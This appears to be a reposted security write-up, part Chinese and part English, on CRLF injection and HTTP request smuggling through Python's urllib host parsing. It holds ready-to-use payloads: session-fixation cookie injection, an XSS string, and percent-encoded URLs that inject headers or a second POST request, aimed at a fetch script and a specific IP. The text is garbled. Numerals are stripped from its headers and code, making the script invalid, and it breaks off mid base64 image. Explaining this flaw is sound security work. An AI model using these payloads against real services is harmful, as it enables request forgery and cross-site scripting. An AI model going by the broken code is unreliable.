catalogue

. Overview

. The urllib Bug

. Attack Scenarios

.  其他场景

. 防护/缓解手段

1. Overview

Python's built-in URL library ("urllib2" in 2.x and "urllib" in 3.x) is vulnerable to protocol stream injection attacks (a.k.a. "smuggling" attacks) via the http scheme. If an attacker could convince a Python application using this library to fetch an arbitrary URL, or fetch a resource from a malicious web server, then these injections could allow for a great deal of access to certain internal services.
类似于crlf注入,python的urllib2/3的这个漏洞的本质在于HTTP协议是一个7层的弱格式协议,而库本身又未对输入源进行敏感字符过滤,导致注入的发生

0x1: CRLF Injection

CRLF是"回车 + 换行"(\r\n)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP 内容并显示出来。所以,一旦我们能够控制HTTP 消息头中的字符,注入一些恶意的换行,这样我们就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP Response Splitting,简称HRS

0x2: CRLF Injection实例

1. 注入302跳转

一个正常的302跳转包是这样

HTTP/1.1  Moved Temporarily

Date: Fri,  Jun  :: GMT

Content-Type: text/html

Content-Length:

Connection: close

Location: http://www.sina.com.cn

注入

http://www.sina.com.cn%0aSet-cookie:JSPSESSID%3Dwooyun

注入了一个换行,此时的返回包就会变成这样

HTTP/1.1  Moved Temporarily

Date: Fri,  Jun  :: GMT

Content-Type: text/html

Content-Length:

Connection: close

Location: http://www.sina.com.cn

Set-cookie: JSPSESSID=wooyun

这样就给访问者设置了一个SESSION,造成一个"会话固定漏洞"

2. 注入XSS

http://www.sina.com.cn0d%0a%0d%0a<img src=1 onerror=alert(/xss/)>

返回包

HTTP/1.1  Moved Temporarily

Date: Fri,  Jun  :: GMT

Content-Type: text/html

Content-Length:

Connection: close 

<img src= onerror=alert(/xss/)>

浏览器会根据第一个CRLF把HTTP包分成头和体,然后将体显示出来。于是这里这个标签就会显示出来,造成一个XSS

3. 注入多个(multi)HTTP请求包

通过在换行回车后再注入一个新的HTTP(甚至可以是gopher协议)包,让url解析方发出多个HTTP请求

Relevant Link:

http://drops.wooyun.org/papers/2466

2. The urllib Bug

The HTTP scheme handler accepts percent-encoded values as part of the host component, decodes these, and includes them in the HTTP stream without validation or further encoding. This allows newline injections

#!/usr/bin/env python3

import sys

import urllib

import urllib.error

import urllib.request

url = sys.argv[]

try:

    info = urllib.request.urlopen(url).info()

    print(info)

except urllib.error.URLError as e:

    print(e)

This script simply accepts a URL in a command line argument and attempts to fetch it.

./fetch.py http://114.215.190.203:12345/foo

aaarticlea/png;base64,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" alt="" />

malicious hostname inject

./fetch.py http://114.215.190.203%0d%0aX-injected:%20header%0d%0ax-leftover:%20:12345/foo

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAScAAACCCAIAAACLnpn/AAANnklEQVR4nO2d2YGDMAxE0xPtUAy9UAulpI/9CIcsjWQZSBaSeV+7BB8YD/IhweORoBum58w0dJkUhBBCCCGEEEIIIYQQcne6YXqO/X/XIsGyhFtfv82feXG2VevbX8oP0A3Tztskdifk7RaHhULxVsZ2dJeYveT9mM2vPNO5ojvRjx+o9NpOsqiW+77WdT2omv5+Dd8GVB1uwTiXV0t1w7SkWI89Hv24lbEZTNFD9nQWN3neJAdnitq3sTSovObP8RHVvSh6Tst9X2o6jeMkVHcnpXXDNA3DiM0NfBatB/vxWTC3iexv/TgfXlOjTur1UGxztm4pfu2GaRrHaZqm5/P5HMexahVN8ln04JG5XWjZCfyH627NrT0ttLfFTcMGY+dIfrfqZJVyOfhCie/7doo4cj/VqWaCxgQenH9wUtt/HdPg3Wl8fBGyKrgfn9M0Pcd+7fGOLeuH5cmikteqCX7xzrQ174apqgT9FPP7r8hNVgFcZitHVPfEPSRIgU+L7/ucVHWB4iF4/bUD03HUbYT3tpRV0UTLr3MzzEpwypoTeJqDA/yyi603u9+s21yFtWZBsTL5Wotg3GgfOeBMdEVadYvC1vHBsA4UwCNFA6V2ylrVIdXhHhKkcAY44X0vb2wihytiai4PyDtqD6L0Yvi3Dtki1Tl3ORihLXNoaOs81cGpZ9rWFQ/Smuoy/XYV2aI+NVCqjZeq96gOnEXkVWeS+z0kcxEy28p9F7cqspbXlh1S3QFbp1UXd2d8e2qTojlLOK9L2zo8r0PV9MZwMOf9qxH58aWvunvbutx9t+1k09xPde3zOrW0pJZPnq7q4EgANX2xnLedoCdu/YBV50x4smuY4l+5Vu1cfDAjrPcE9DxxckOG5YR53W7pHp3XNdx3kENx5h1HmI/0GubM+vAJ2hwtd9qHFniSiXVRfaw4LGVmVecs7jkrfsgkz6eN4SMHXpEoqtYVtopXznSHc4fXMM2MM0vTGmbZUKgzxPddltnZLC8uubeQe6yT7+JmS/dfyfbkofx+A6qOkE9D1RFCCCHkn1iWpDgWIb+Ndu1Va7jLWrwmuSMD9/LOqrfJG9ZzgJVXp9p6icq7myaG/Jnkdyk2FF9+StEeZ5vngj77FOcJmburaG/PsNxKLbe5VALowJy8eK4skABkfE5TnfYFA4aybTs+rPsh1dmWAC1D1ZEzSHTO/G8K0PO0rWtzPQN1eZuty/hLB1B1xKd04ZunN9GEJ686L9rF9yquuVmDEhStqmu8TKqOnAEcZZ1i66BgrOricJW4tHNHmNXKU3XkJMr+dZrqnF53uq17i+pcyVB15ByKNcyzVOeddd15XaLy7kwVG3WqjkSICQ7cm1Ndu96dXBNldw6us4YZV95Gpoiq4qAgZxeQkDdw6+f8rStPCCGEEEIIIYQQ8gbe65Ed4BfU5lJ+oCByJfrxI6EpqQVCFGd0Jid38TPYWyXu2t+Zfizfi/4usqp7aweh6sgVeN2Scnc4//bI7eB8X+F7EaOd9xLYBWWeeEMdvSMTnShfaLmeqF4BDQpCyfOAgtw8w/bUvuq6PUFB+EzgMNB4TeQQ8zTAe604elMyPLhk4L8DeL+tE3nW6ln3MovmdbggP3nDqz9dJ1SZZ9yegfe4XxA+s2i6q7+e/PtY75H9A57mH+zWD2M47st75nWB1KpV8jyqK6oLC7IPkn2qS1wRbs/SAO9WnciKovs44Imej+hUAeIvkfihOigPMxz0R5hRTFD+zKrqjgQfReQKOtqepiD3zDkvrnh+Hn2f3fvgHcRSPGbr8lp6h62LCzpRddDWJa/d/OIW5J/ZDdM09BTd58Fu+LvmdY9HP1bndfU7nFfdm+Z1oKB/mdeJ9vRVh8rGqnOCjPUSD3k/uouDsU5+DXMzLO63XdZJW7iGaSd2bs87soaJSvIK8tYwU6qrLDh6a5iyPZ3xrWrPYKUYtnzDM4Ncm9Q48rZ81dID53RfwzeqrhvG1T5+z8VRdN/DN6puG/h9y6W9RpzUHCGEEEJ+if+Zc2wLiN8ykiQXRaxV/0Nfu+I08KvWTMj16IoX/L/2ZT9dgcv1cKqOvBNn+8luNMu9b+nyUQvAAdEy69JZPlwlX6U24L4/Uh3aeXfGCBylkhhsaJBTlXBj2H6GBxMvcl4dytwqhP5TUZW209ucz2SVAl9N5CX2EPt5+NoJEbjBbDkH4n3hKqa0uupafZozqgtEEfiPFqXDCArs1EnIwr6wmurBcuCow1X80srDbw7ACTQRROMi50zwEUw9aiZkA83rvEf7DinCPM0v+23dQdUdsXXwfFo3kgGtYTrTmLS1AeEq4bwuEa6SrtJ2+oF5HZom2tJHafPgUPcfloTJTQBrcc6CYXqMZ8JVyoNlX8yFqySrJIpK9HivSmsllsOVNUyzksPhJSGEEEIIIYQQQggh5H/51625ip9r6OU3/8d9xX9DLbi//VU8/ekfD9rff+BLpvMFXaHjQt+AjMNAtfJSpM2RYObth6Tgw6rrz/940CHVlRuM1X74O6orXB7KVkr4Hkzj+P9tc2Ec1bXEsBTxNvH97uzHg5YsT/yuzbFrR6/l9V/RGXz9Z09EUuR1gBo5pzoQOSXzAzVyn771R00/Psf+Ck+kCwN7XlsMSzdMyfHEnEokLjytkEPZcoIf1OPHKtVU6Ni6wk1slA1hbB2oUmNEkq124OuTNGvY1lm/Vvx+bnClRdZxq3bDpN/lSwyu6vIxLOkosvVE+4esSTVQyLx1fL/qoKXc8tdW2aiuFvpUjUiy1fZVBy7nkOo8f+4gpLceO0Un8ATevK4hhsUNMVDDF2AQPN9OW5DvcnnSvA78UDGqecfUureqaORghGnrekR13jA1mtvHyyRbSqoupNri9RiWZAtrMbkWzFPx51T3ylN/7CaruiMRSZ9UHbZ1iWUWT5N69vt88vuvDiowZRZDSwxLstujVYr6vE7EHvmqA/2geV4HkoP3tngqLOdwDRFJfp1Ks+I0Mrx4v0Xq8zpbPbmEqeYefiPT1tWQRgjs0FRjWHItrG/n8n9tDTNhLnrwtZqDqsPpy4K8KjlrmDnViSmUbhB3NGxukzqIVmCdNUxoyYpRiukOVN2defsGfRPpJaJvglr5ES76rZyfFB35HZbxy2U01/NjN4QQQgghhJA7oVYOdy0kHln6Aj4szkFRxcoc0NvfMHmqjfsoV1wlkQHMNm7L6vYMervadea/ZDf/rbogB3iwHkUy+9/Of6pOWubZXPEygXQF3n4pYmQCjTj1RMmbY23ItfFUVzENomOYDdgdZFXXHEWinyJnqk6lnqXR5F5l61lPzk21+4NV57g1ofCfxxGv/zAHc7BrjiJBkWbeCDNT1Vh12kv7kR47eD6oIHk11oZcH+uxquLrCuvX4v58turWf1sMiK6AnzbVm8MR5vM5Dd1LP+u1p/b+RT5u8s1RjIq7P9DWVT0MzZrC++d1rVEk+CERpU3YJRB2sDbIsM/WGX/ihK3jCPPmeKpzQx6Xg0emR4a66lAUSbziCH8/WXXgp6Z5na1nIvm1HFbJDlrmdTD8x/4rjp47r3OO64L8obBRsjNcdCuvTdH6GSAzSNR/pusJkgexNuSW7FzDtKGv5nhSdaUR23quvzBaUZ23rIrylMdMLB0OnilOxkNuZ78uWU+UvHnZhxBCCCGEEEIIIYSQ36XB+/ajHoM73gBxYv2u9f4JcnWUr8NV3PyaFUHVkTshrNd1Og9VR76c2cBl/JfUPm3nfK2mt4cezqay2RRObB+X4WbPp357ZA6v8qigrVLoxMoHiUxhT74UmaydKjG2LOd1wt/CTvisK+/yL/I4kw5WyA6h5EU+Vg8Jx2NQeVhPdP24dCf5EpQQ1oj8Fv2Y9DWyqgO9df3Ri4Hu7Jd6TDHG7StMrkrPqs4khwVJ4Jn15A2rUOQ36MdXqAoa+Kle5/fKuurMyNEf0/oxNU7yg/O6QjZghFsctnF+teQfXtAl12cVUqbnHlAdDCvI27o4+YmqSxbkHcTVoOqIQIaOJMJI9qpO/b58EiiY1yk9ouSH53Wo8qCgcpl3i32qzOu2y6TqiKAhOM39NExSdU6okBMXA6KHUHJvDfOA6mBBW21kQbU1zD0vLiLkCOxohHwabh0T8jHwHjkhhBBCCCES/GKeVBIONAk5QsMKCXhv4y1WNaFXDn4/mjhqrkvu4SmPleu3AbkUedUhv5NbqO6FdqyRXszzD9GndspvD93ousknKLaT6zGtQHV27Ike7V78DrAsZRnFq9atsdARNGf1bV8o+N3Lxfn620NUHdEsz+mMHTPnuHExKVvnhPyIfi2/MdUQQZPxTQnPdIWCW0l9aUT57RSPIUYekMfjsfaKxPMYBNQ4Xk8Z1SkHYiu19a/WCJp3qU6NBlY5gbrlciA/jOkLTqQPCmODI8es6rAn5CI2+wZ4XdC7Bm8o34qT6jKSrtWMnwchj1kgQyrs0qrO6/NHbN3yX6ILf0x1tXiMtcYKm4aqI1vX96PdwMkLTmCLqzprUe28bv5/HGX3bIugOXmEiSRX+9TOlkPw8SDykxSdINNXl6d5GIDz8DRs4neckSx6p0RLBM0R1dnP9zgLsPEiiRo++ycSQgghhBBCCCGEEEIIIYQQQgghhHwVf0BiFUrDLUBsAAAAAElFTkSuQmCC" alt="" />

Here the attacker can fully control a new injected HTTP header.
The attack also works with DNS host names, though a NUL byte must be inserted to satisfy the DNS resolver. For instance, this URL will fail to lookup the appropriate hostname

3. Attack Scenarios

0x1: HTTP Header Injection and Request Smuggling

if an ordinary HTTP request sent by urllib looks like this

GET /foo HTTP/1.1

Accept-Encoding: identity

User-Agent: Python-urllib/3.4

Host: 127.0.0.1

Connection: close

Then an attacker could inject a whole extra HTTP request into the stream with URLS like

./fetch.py http://114.215.190.203%0d%0aConnection%3a%20Keep-Alive%0d%0a%0d%0aPOST%20%2fbar%20HTTP%2f1.1%0d%0aHost%3a%20127.0.0.1%0d%0aContent-Length%3a%2031%0d%0a%0d%0a%7b%22new%22%3a%22json%22%2c%22content%22%3a%22here%22%7d%0d%0a:12345/foo

aaarticlea/png;base64,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